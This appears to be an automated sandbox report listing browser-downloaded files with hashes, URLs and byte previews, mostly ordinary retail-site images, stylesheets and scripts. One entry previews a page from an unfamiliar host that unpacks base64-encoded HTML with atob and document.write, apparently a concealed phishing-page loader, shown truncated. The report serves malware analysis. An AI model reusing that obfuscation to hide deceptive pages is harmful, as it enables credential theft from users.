                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 800x232, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):51577
                                                                                                                                                          Entropy (8bit):7.959099354323958
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BB19D1EAAEED3BC8417C82C8B77512A6
                                                                                                                                                          SHA1:DF4C2610CF126EA45A551F7EAC373A4C8DEBAF8B
                                                                                                                                                          SHA-256:56D43DDC23B7D81E534FCABB9AB739E792F046663F7B4C2CA9915235DB032156
                                                                                                                                                          SHA-512:3B382FF2E9AE0DD4DEC4037BAB84BCD02476FB4A21A07ABD1763DA899FABB84E24A65013807CA8109393F066661F87F91F67B3B01AE2AEF87C0F25B6371D8FA1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... .......................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........ .............................................................................................................mmT!b.........../..$.+B.q|.....5..Z..M.qJR.S,].......u.1.$E.['if.jKIY.....D...:.......................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (8621), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):21750
                                                                                                                                                          Entropy (8bit):5.858146417634184
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6314433585A9CD845AB89C07A34B56C8
                                                                                                                                                          SHA1:62864EAA389C86807890A97C30B6D3FEF814D010
                                                                                                                                                          SHA-256:B643FA586AF4F022B8D5F699732B8283B589395D23184C554650AEC8B08CCB6D
                                                                                                                                                          SHA-512:E6D3B1A118D7DDC7F1606F052E08F120CCA9E7BCFD0E50192CF9A343554751F7D8453021ECE55A710874F16CBEE5DAA760F768AE62E59FFA005931B375196445
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://eos.atebasyno.com/Jed4ZO4/
                                                                                                                                                          Preview:<script>..if("https://eoS.atebasyno.com/Jed4ZO4/" == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20vcmVjYXB0Y2hhL2FwaS5qcz9yZW5kZXI9ZXhwbGljaXQiPjwvc2NyaXB0Pg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+DQogICAgPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJub2luZGV4LCBub2ZvbGxvdyI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPg0KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4NCiAgICA8c3R5bGU+DQojSFJKdElYYmRERCAqIHsNCiAgICBwYWRkaW5nOiAwOw0KICAgIG1hcmdpbjogMDsNCiAgICBib3gtc2l6aW5nOiBib3JkZXItYm94Ow0KICAgIGZvbnQtZmFtaWx5OiAiU2Vnb2UgVUkiLCJIZWx2ZXRpY2EgTmV1ZSIsIkx1Y2lkYSBHcmFuZGUiLFJvYm90byxFYnJpbWEsIk5pcm1hbGEgVUkiLEdhZHVnaSwiU2Vnb2UgWGJveCBTeW1ib2wiLCJTZWdvZSBVSSBTeW1ib2wiLCJNZWlyeW8gVUkiLCJ
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):149
                                                                                                                                                          Entropy (8bit):4.696856040523153
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6BADB3D5D207388F0599DF2450CD16FB
                                                                                                                                                          SHA1:D2572EF2D2B6DDACDFD8A1F0E21C441506A45450
                                                                                                                                                          SHA-256:534A59664AF7A2C407379333A094C7840B99467E3AE8E7ADC0F9FC41EC76199F
                                                                                                                                                          SHA-512:2FF7A99FEA0C431902DD1E4E60055E10093C99E8428E434C05B13EC8FBC235A77E6312858F060E221BEA659F6F82F034D9969D3E79327AC9FB21830C6E87984F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/40457925/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"40457925","rollup":{"average_rating":4.54,"rating_count":1408,"review_count":1408,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7144
                                                                                                                                                          Entropy (8bit):7.841309394700742
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:8FD39B98B6405502FBFDFB9774F3B7EC
                                                                                                                                                          SHA1:C41F32AFB96B541DCA7CC0A68D7B3D5EBC64A07D
                                                                                                                                                          SHA-256:C9B9042BC1386B5E64258A740A5DD52D2A18FCCE64E1A6074A4FAF50DF1F5C4E
                                                                                                                                                          SHA-512:E36510587BF673FB7FD2731EB291602625780C5AB94EEBF590335D73A3838B64DF5A42E2CF1C3F819E3D6CB07865ADFFC05D7A0A68CD684A4276F183BC483317
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Polytrends-Laguna-All-Weather-Poly-Outdoor-Adirondack-Chair-_28Set-of-4_29---Foldable.jpg?v=1728075295&width=320
                                                                                                                                                          Preview:RIFF....WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 P...0p...*@.@.>9..D"!...t. ....p.P......'....{.].>.......{J.;...<...._.....[.../..p/._.:U.......N.................C.!.g......?....?......../.S...S.....k....5.Z'...{.{w........G.'..z....w.@7...o.........'..?..L.........O.?..Q....z...._.....0....+....!.EcyU..d.6...d (.r....r.........W.(..>.B....+....F........Z4..8] ...".....`...{R.K.~.I..<.3R.d..U.).....d..J.....*.+..Jb.'...[u.<..)..t..k.`.f........y}J.#...3...9...jJ..B...'.v..{..D...... .".^9...dd6^f..y;..v......../..<.`q}^.....p.&.MH.T'./...v...\I?
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):133
                                                                                                                                                          Entropy (8bit):5.202262395749922
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D6D92AF15B86A7862B72EF9488670940
                                                                                                                                                          SHA1:7DD674288B0F2282C2E8F0FE0D5C370527350032
                                                                                                                                                          SHA-256:A66D53C24BD05E9DBCFB5AE420A74FB01EAB8316CBD85C1C210533EFCB223AB1
                                                                                                                                                          SHA-512:FB1E39224932FAD38C3E23061211FC9B64F7BE54054EBCE6595A589CC16863E2721A245911455FF8F49145D0B1F40BEE4654CB08764B496F4C5E7E9C3554B91D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/RageClickCapture.DnkQ4tsk.css
                                                                                                                                                          Preview:.RTmkG{width:190px}@media screen and (max-width: 750px){.RTmkG{width:100%}}.U4CmB{width:100%}.E4OHT{opacity:50%}.hLtvr{display:none}.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):37428
                                                                                                                                                          Entropy (8bit):7.965857471670544
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:41460C24C40FA095F3CA6953138D7AD4
                                                                                                                                                          SHA1:92BB18E14E68AC6A3528D49785DBD39C244E54A2
                                                                                                                                                          SHA-256:12DE265EBA390B41455FDACF953ACB7C9D0B7773DC6CDDF62DA949303793107A
                                                                                                                                                          SHA-512:1E9CC046F905C89AFB81B44E1E1B029C8FE6FD329ABACDA6491B6723E71EA84ABFAECD13D1B7AAA57806092FCAE3FEEFBAC8A502F3DB5CFEA00F4A657BC7841E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/collections/Alexander-Home-Grant-Modern-Abstract-Area-Rug.jpg?v=1710949885&width=320
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................<.m...sZ..ia.s.D..gT.6.+....5..Y.....un...j$..I.(u.).t.z.A.f....Q....3L..G...l....*.},.e.5.\....~.i..k..z..*./?ES].....b.\/..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):36668
                                                                                                                                                          Entropy (8bit):7.982630968352015
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:59658752F5BB94C991A83F8D4336C39A
                                                                                                                                                          SHA1:6716A35449EA46DB791B9F9476D1C97DCF0307F5
                                                                                                                                                          SHA-256:87B7ADA7E86CAB06D0E180A32DDCD3FCDA5EA2368930D69430147F35325EDA0E
                                                                                                                                                          SHA-512:564610EC89D6688281EA4F76897626A0092E51E49D0B7E6A6CD3B43234B8379ACCBB8452BE32ED1F8A23E4F1DD1618B3104D8A201A49819CFDC5042A3C0C62F0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Moroccan-Tassel-Shag-Delores-2-inch-Thick-Rug_06470f76-6232-446f-977e-8501fcbcec07.jpg?v=1715176279&width=320
                                                                                                                                                          Preview:RIFF4...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....PN...*@.@.>9..B.!!..v. .........N~.....B.a$.........~.....R....{..`.K..........?n?u=........S......................5.U.S..._..O....mO................'........l.5.......=................G...................{.........?x..>...r...+....`.f>..........~.......S~............G.........C...g...?..'~..........G.................._.?..........?.....?._....}...`5.5..*A.....5....{....BY.^..g......7.qN..l...h.K\..l.+..h.~.r.L.."....c7.x.T.........5.r.."c....+w..=.toM...m.xru..H. ...N...al0.1.Z_...P.j.7.F..bJ...).MQ.*z.....&<
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):65861
                                                                                                                                                          Entropy (8bit):7.980895481345468
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2222FB4EEF9B96EDC7BDE1863E63E26C
                                                                                                                                                          SHA1:6A5DDE8D11EEA8EC6051FC1A07D330D3F4CCD60F
                                                                                                                                                          SHA-256:0980ECF8521E5D100796AA24A8117A4B01BAC9EB65FE0D1C571162E0F9CA3698
                                                                                                                                                          SHA-512:0269170EBCBE5DF6B0E41A5EE5BABEFF6E90EA3BDED7C44DFB0E59933E3DB60EDB6B687DF245F9609F34C0D85BAD8215F97D8B78A4B05B0197F8A1248D1B2B91
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@..........................................................................................'Q.XWr.....G}..l..-Q&B.na.Q+t.E.@..JUzi.%.3Cz.[r./.S..-...!+..........h.3A....Hj.jf...tV.l.&..iA..|.k.Jm...l.9...T....3..`...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):79242
                                                                                                                                                          Entropy (8bit):6.019678305853488
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A0CE64213F4F6193A598DE1CDBAEA665
                                                                                                                                                          SHA1:FEC9A873B214601198F7312BCB1BF99204014085
                                                                                                                                                          SHA-256:F0DFF86310E9D08A2D80DBE68BAE9367F8CD6CBD4B7D036F09B0702D035C7E8C
                                                                                                                                                          SHA-512:72DA125D31FD39B9B6571286C9B4B35D2B8875C8E299155A4D44742FF2B3FDF9B8CD5A7B888CF2BA26FAF4842EA6810CF7D6DEE5DC4B7E55AED03C623884356C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.gstatic.com/recaptcha/releases/aR-zv8WjtWx4lAw-tRCA-zca/styles__ltr.css
                                                                                                                                                          Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1390)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1502
                                                                                                                                                          Entropy (8bit):5.042991112358059
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:9978A7BAC524C18135AD2A44711E03D7
                                                                                                                                                          SHA1:A972848A511F4FAD1821D609A22F347A0E118F63
                                                                                                                                                          SHA-256:F269B788E4F41FF546D5FE77357A4212B5334504F1E528402544BC05C1979F93
                                                                                                                                                          SHA-512:E360C609A15F36EFEF5D1574BC81BCD5874D85F963A6903A1F4FBE18397A02C1B21511C3C798B8056912149CCCE6B85DEAC142B75E4F1F4154A78CCB7080D91A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/navigation-mega-columns.css?v=62327496828350225961729142870
                                                                                                                                                          Preview:.badge{display:inline-flex;position:relative;top:-2px;align-items:center;margin:-.6em 0;padding:.6em .9em;border-radius:2em;background:rgb(var(--text-color));color:rgba(var(--bg-color));font-size:1rem;font-weight:700;line-height:1rem;white-space:nowrap}@media (max-width: 1050.98px){.main-nav__badge{display:none}}@media (min-width: 1051px){.main-nav__badge--1{background-color:rgba(var(--badge-1-color)/.1);color:rgb(var(--badge-1-color))}.main-nav__badge--2{background-color:rgba(var(--badge-2-color)/.1);color:rgb(var(--badge-2-color))}.main-nav__badge--3{background-color:rgba(var(--badge-3-color)/.1);color:rgb(var(--badge-3-color))}.mega-nav--columns .main-nav__item--go{display:none}.mega-nav--columns .child-nav__item,.mega-nav--columns .main-nav__grandchild{padding-right:0;padding-left:0}.mega-nav--columns .child-nav__collection-image{min-height:54px}.mega-nav--columns .child-nav__item--toggle:not(.nav__item--no-underline){margin-bottom:calc(2 * var(--space-unit));border-bottom:1px soli
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11154
                                                                                                                                                          Entropy (8bit):7.793274122257233
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C5EA1A4DAF72A6DDB1876682237F5C4A
                                                                                                                                                          SHA1:C5E1B9D74C7C4A392F2D4A515F0AFD44E1AAA21D
                                                                                                                                                          SHA-256:23900736EE5AF60591C7947A571D474AEB6BEDBB627C8F6E3563543394169E08
                                                                                                                                                          SHA-512:FE386CD84EA7643FA4D21C01CCE3CF4FAA96C0C1461BC74A2AF78D591AD8E9A58D763F40F2BD7E9FE08485C50680AAA8DBB6894E8343C6F04F43DB0594BDFDD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.................................................................................. I..P.>G.D..D.>T...........i..@(e,.D...&y"D...*.K*..]e.z.......F8$.D..I..M..%..L...H.t..X.....5.......J..T... .0O.....,H...&]6|....4..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):71246
                                                                                                                                                          Entropy (8bit):7.993628330771576
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6DB522BEE35A508200C897FD662D70B2
                                                                                                                                                          SHA1:275B4C74BD4519884443767093FFB3CA907F3B06
                                                                                                                                                          SHA-256:0BF660D5334CCCF8E67BE4731A60C2191C61C1146EA3908902FCB80CA11A8C59
                                                                                                                                                          SHA-512:56C76A8D9B6E61D3886AE06DE016C0DF3C05588998FD2D4DEC5827607D95073C815C2C157A30B9AB36FD5F8871261B55787235BD29267C44C19DAD23A91B3B8C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/10102024-MOPS-800X800_Hero__BedroomFurniture.jpg?v=1728487084&width=650
                                                                                                                                                          Preview:RIFFF...WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....}...*....>E..D....'S.8P..M......>PR....>.&._Z..M..*..T....O..)...~......../..G....-.c....."}M..._m..<..G..............S.+.........?........@.;........^.?........7._.?/.........../.'...?...|..0...#.....O./.....=....X........?....o.................._....@..=@?.z.~......G.K...........c...O.?.o...r/....=........x~..c......7?...............e/..7...{.|..?._.|..|.~w.O.>.~......O..._..............^._......#........o>..........'........].!......................_.....|3~...<......q.FP:.R....P.dc....a..A..a\......N'..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):21636
                                                                                                                                                          Entropy (8bit):7.9119620655233875
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:10DCD08242641956EFBD028623AE9CD4
                                                                                                                                                          SHA1:C4B889B24ACC03DD1784B868F18F4E54E14C721A
                                                                                                                                                          SHA-256:106A59C339BF7ABBE4180FF70335953858789661F787030064FF0FD46F24DFB2
                                                                                                                                                          SHA-512:73CCDD2B8D28528FD26E9731AA534A72C03EB18490694013D5AFCB56FAF93E2C05F4B2A3B10E7DF7552581D1E7CC14BDEA612653BC01E5DCEA1BAF02AA857722
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................,............................l....&XeO.............5.N.E.t..w.9.]6|^..q{...............j....{......ZG.|....,Y....}.m...........jZ}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):116513
                                                                                                                                                          Entropy (8bit):5.34426438977711
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F74D2C1D7F7B2041E00F0347C7D2D5F8
                                                                                                                                                          SHA1:ABE7F23DFC882240C6641B061A84AFF68FDEAB5D
                                                                                                                                                          SHA-256:A3C053D11506F3F1EF0795F89739C8A0F99E4E2D50FC05205B4EC0A818A32C57
                                                                                                                                                          SHA-512:EB4D8E401D7EEA9F625A04D3B1DEFD7856A5EC31ECE9B67A806924EFB34D4B3FE879C0900905F16012A2903E2533A0D9BD4B153C87918623ABF219B9C66D7E00
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:!function(){var e={1644:function(e,t){"use strict";function n(e,t,n){try{var i;r({error:e,context:t,shopId:o()||(null===(i=window.Shopify)||void 0===i?void 0:i.shop),notes:n})}catch(e){}}function o(){try{const e=document.getElementById("shopify-features").textContent;return JSON.parse(e).shopId}catch(e){return null}}function r(e){const t=new XMLHttpRequest;t.open("POST","https://notify.bugsnag.com/",!0),t.setRequestHeader("Content-Type","application/json"),t.setRequestHeader("Bugsnag-Api-Key","95ba910bcec4542ef2a0b64cd7ca666c"),t.setRequestHeader("Bugsnag-Payload-Version","5");const n=function(e){const t=(n=e.error).stackTrace||n.stack||n.description||n.name;var n;const[o,r]=(t||"unknown error").split("\n")[0].split(":");return JSON.stringify({payloadVersion:5,notifier:{name:"ConsentTrackingAPI",version:"latest",url:"-"},events:[{exceptions:[{errorClass:(o||"").trim(),message:(r||"").trim(),stacktrace:[{file:"consent-tracking-api.js",lineNumber:"1",method:t}],type:"browserjs"}],context
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (4628), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4628
                                                                                                                                                          Entropy (8bit):5.016963776101131
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:4E5D4A81022DD57A7966D22B1BCE110A
                                                                                                                                                          SHA1:30FF74E57D90727B65C8ED06B4717B1FC4625A79
                                                                                                                                                          SHA-256:81D05063046F554F12A9B78AE0E70856B09610019098297AD8060904C889653E
                                                                                                                                                          SHA-512:64E42EEA78DD9494ED020FF9568A463D04CD35618A5F74C6E97BF5033E9FB942047ED0F15CFB8AE2A9EB1D94F315A7512D9B2EFBAF760A74EBF7F2C9A17A209F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://js.appboycdn.com/shopify-scripts/0.2.0/braze-web-sdk-script.min.js?api_key=dc9d7751-8184-4d73-92ba-bc7abcb22008&content_cards=false&in_browser_msgs=false&sdk_url=sdk.iad-03.braze.com&shop=a37a28-2.myshopify.com
                                                                                                                                                          Preview:(function(){const e=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-web-sdk-script")));const t=new URLSearchParams(e.search);const s=Object.fromEntries(t.entries());if(!document.querySelector("script[src*='braze.min.js']")&&!document.querySelector("script[src*='braze.no-amd.min.js']")&&!document.querySelector("script[src*='appboy.min.js']")&&!document.querySelector("script[src*='appboy.no-amd.min.js']")&&!window.braze&&!window.appboy){+function(e,t,s,r,o){e.braze={};e.brazeQueue=[];for(var n="BrazeSdkMetadata DeviceProperties Card Card.prototype.dismissCard Card.prototype.removeAllSubscriptions Card.prototype.removeSubscription Card.prototype.subscribeToClickedEvent Card.prototype.subscribeToDismissedEvent Card.fromContentCardsJson ImageOnly CaptionedImage ClassicCard ControlCard ContentCards ContentCards.prototype.getUnviewedCardCount Feed Feed.prototype.getUnreadCardCount ControlMessage InAppMessage InAppMessage.SlideFrom InAppMessage.Clic
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (62407)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):63312
                                                                                                                                                          Entropy (8bit):5.538869367499219
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A896A78E899C942271A7347AD7245306
                                                                                                                                                          SHA1:BFC514841F64D98170637AD95995758F43465C68
                                                                                                                                                          SHA-256:D33E08986BCE828793730F5D8D3ACC7663D5B9C8594FA90A5E83AC6D16C3158F
                                                                                                                                                          SHA-512:F88E31EE62063190B769FA24A08C85668E57DF7A176D497426291AA37428327C4840B97D42BECE14C35A66B28E1D091630466696BBB51315CBAB7D845E8A5489
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/DeliveryMethodSelectorSection.DmSUYxZn.js
